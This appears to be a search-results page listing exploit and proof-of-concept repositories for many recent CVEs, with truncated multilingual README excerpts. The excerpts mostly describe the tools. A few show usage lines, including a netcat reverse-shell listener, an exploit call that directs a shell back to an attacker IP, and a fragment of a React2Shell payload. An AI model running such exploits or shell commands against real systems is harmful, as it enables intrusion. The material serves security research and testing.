517617 matches found
CVE-2026-47103-python-statemachine-rce
CVE-2026-47103:Python StateMachine 通过 SCXML eval 注入实现远程代码执行 严重性: 严重,CVSS 4.0 9.3 ,CVSS 3.1 9.8 (由 CNA VulnCheck 指定) 向量(v4.0): CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 向量(v3.1): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 受影响版本: Python StateMachine = 3.0.0,...
CVE-2024-4577-PHP-RCE
PHP RCE PoC CVE-2024-4577: Argument Injection in PHP-CGI Overview This repository contains scripts to check for the CVE-2024-4577 vulnerability, an argument injection issue in PHP-CGI. You can use the provided Bash, Go, and Python scripts to test a list of domains for this vulnerability. I've als...
react2shell
React2Shell 针对 CVE-2025-55182 未认证远程代码执行漏洞(又名 React2Shell)的概念验证漏洞利用程序。 该脚本用于在以下 Next.js 版本及更早版本上获取 shell; 15.0.4 及以下 15.1.8 及以下 15.2.5 及以下 15.3.5 及以下 15.4.7 及以下 15.5.6 及以下 16.0.6 及以下 14.3.0-canary.77 及更高版本 它仅在 16.0.6 版本上测试过。 用法 root@kitploit: $ ./react2shell.py --help d8888b. d88888b .d8b. .o88b...
CVE-2024-32002-git-rce-father-poc
This repository does not have a README...
Project-Project-Chimera-Exploiting-a-Modern-WordPress-XXE-to-Pillage-Secrets-
Project Goal: To demonstrate a complete attack chain on a vulnerable WordPress installation, exploiting CVE-2021-29447 XXE in media library to achieve remote code execution and full system compromise. Phase 1: Reconnaissance & Enumeration Network Scanning with Nmap: bash Quick SYN scan to discove...
CVE-2025-55182
CVE-2025-55182 RCE Herramienta de comprobación de uso propio para verificar la vulnerabilidad CVE-2025-55182 Principio de la vulnerabilidad React Server Components presenta un defecto en el análisis de rutas al decodificar los payloads enviados al endpoint de la función del servidor. Utiliza el...
React2Shell-CVE-2025-55182-Testing-Environment
React2Shell CVE-2025-55182 Testing Environment A containerized testing environment for CVE-2025-55182, a critical 10.0 CVSS Remote Code Execution vulnerability in React Server Components. ⚠️ WARNING This environment is intentionally vulnerable and should ONLY be used for: Security research and...
xwiki_solrsearch-rce-exploit
solrsearch-rce-exploit 针对 XWiki SolrSearch 的未授权 RCE PoC CVE-2025-24893。命令执行 + 反向 Shell。 CVE-2025-24893 – XWiki SolrSearch RCE PoC 针对 XWiki SolrSearch 模板注入导致未授权远程代码执行的概念验证。 已在 XWiki Debian 15.10.8 (修复版本:15.10.11 / 16.4.1 / 16.5.0RC1)上测试通过。 ⚠️ 仅用于教育目的。请勿在未经授权或明确许可的系统上运行。 功能 通过...
CVE-2012-2982-Webmin-RCE
Webadmin 1.580 RCE PoC CVE-2012-2982 Este repositorio contiene un exploit de prueba de concepto PoC en Python para Webmin versión 1.580 , que es vulnerable a ejecución remota de comandos RCE debido a una sanitización inadecuada de entradas. La vulnerabilidad existe en el componente file/show.cgi ...
apache-cve-2021-42013-rce
apache-cve-2021-42013-rce 基于 Docker 的渗透测试实验室,用于模拟 Apache HTTP Server 2.4.49 上的 CVE-2021-42013 漏洞 Path Traversal & RCE。 本项目旨在隔离环境中模拟并利用 exploit Apache HTTP Server 2.4.49 上的 CVE-2021-42013 漏洞。研究过程中搭建了一个名为 docker-exploit-lab 的专用实验室环境,攻击场景通过同一网络中的受害者 victim 和攻击者 attacker 两台机器进行。 项目结构与安装文件...
CVE-2025-55182
CVE-2025-55182.yaml CVE-2025-55182 poc nuclei -target url -t CVE-2025-55182.yaml 根据nuclei-template改造而来 核心代码: root@kitploit: "then":"$1:proto:then","status":"resolvedmodel","reason":-1,"value":""then":"$B1337"","response":"prefix":"var...
POC-CVE-2025-68613
描述 针对 N8N 已认证 RCE 漏洞 CVE-2025-68613 的 PoC 漏洞利用代码 使用方法 python3 poc.py -u -c...
CVE-2025-55182-PoC
CVE-2025-55182-PoC CVE-2025-55182 的 PoC root@kitploit: Usage: python3 poc.py -u http://target.com --cmd "" 法律免责声明 本工具仅用于教育目的和授权安全测试。未经双方事先同意,使用本工具攻击目标属于违法行为。开发者不承担任何责任,亦不对因使用本程序造成的任何滥用或损害负责。 环境要求 pip install requests 使用方法 你可以通过三种模式运行该工具:Check(检测)、Exploit(利用)或 Interactive Shell(交互式 Shell)。...
CVE-2024-28397-Reverse-Shell
CVE-2024-28397-反弹Shell 针对CVE-2024-28397的反弹Shell。 漏洞利用适用于 js2py = v0.74 要求 requests库(pip install requests) Python3 Netcat(或可用于监听反弹Shell的工具) 使用方法 监听端 root@kitploit: nc -lnvp 4444 利用端 root@kitploit: python3 exploit.py 10.129.66.160 8000 /runcode --localip 10.10.15.11 --localport 4444...
CVE-2025-67435
CVE-2025-67436 PluXml CMS 5.8.22 中的认证远程代码执行RCE 研究人员:Chowdhury Faizal Ahammed 安装 root@kitploit: git clone https://github.com/pluxml/PluXml.git cd PluXml ddev config --project-type=php --php-version=8.1 --docroot=. ddev start 概念验证 逐步利用过程 认证:使用有效的管理员凭据登录 PluXML 管理面板 导航到主题编辑器: 访问管理仪表板 导航到:主题 → Home.p...
CVE-2023-27532-RCE-Only
复刻版本(仅限 RCE) 已复刻该仓库并移除了凭据泄露部分。已应用编译修复。 CVE-2023-27532 用于利用 CVE-2023-27532 的概念验证代码,可泄露明文凭据或执行远程命令。 概述 有关漏洞及其利用的详细分析,请阅读 Rapid7 的 AttackerKB 分析。 编译 使用 Visual Studio 打开。由于 Liberis 的 Veeam.Backup.Common.dll、Veeam.Backup.Interaction.MountService.dll 和 Veeam.Backup.Model.dll 已包含在项目中,因此无需为此担心。 用法...
n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613
n8n 认证表达式注入远程代码执行 – CVE-2025-68613 严重远程代码执行 CVSS 9.9 在 n8n 工作流自动化工具中 概念验证 – 仅供教育和授权安全研究使用 ⚠️ 重要法律警告 此代码严格仅供教育目的和在受控实验室环境中进行授权安全测试使用。 未经明确书面许可,在生产系统或任何系统上未经授权使用是违法的 ,并且在大多数司法管辖区违反了计算机滥用和网络安全法律。 使用风险自负。作者不对任何滥用行为负责。 漏洞信息...
cve-2025-59287
CVE-2025-59287 - WSUS Exploitation Toolkit by adel-h4x0a ⚠️ For Educational and Authorized Testing Purposes Only ⚠️ Overview This toolkit demonstrates the exploitation of CVE-2025-59287, a remote code execution vulnerability in Windows Server Update Services WSUS. Components 1. Encryption Module...
CVE-2024-27198-POC
CVE-2024-27198 – JetBrains TeamCity Authentication Bypass & RCE PoC Author: EynaExp Scope: Research / Defensive Validation / Authorized Testing Only Overview This repository contains a proof-of-concept mass scanner targeting JetBrains TeamCity instances affected by CVE-2024-27198 , an...
CVE-2019-16278
CVE-2019-16278 - Nostromo nhttpd RCE 脆弱性の説明 Nostromo nhttpd バージョン 1.9.6 以前における、HTTPリクエスト処理内のディレクトリトラバーサルを利用したリモートコード実行の脆弱性。 影響を受けるバージョン Nostromo nhttpd 1.9.6 以前 エクスプロイトの詳細 このエクスプロイトは、URLエンコードされたCRLF文字(%0d)を使用してディレクトリトラバーサル脆弱性を悪用し、/bin/shにアクセスして任意のコマンドを実行します。 動作の仕組み: 1...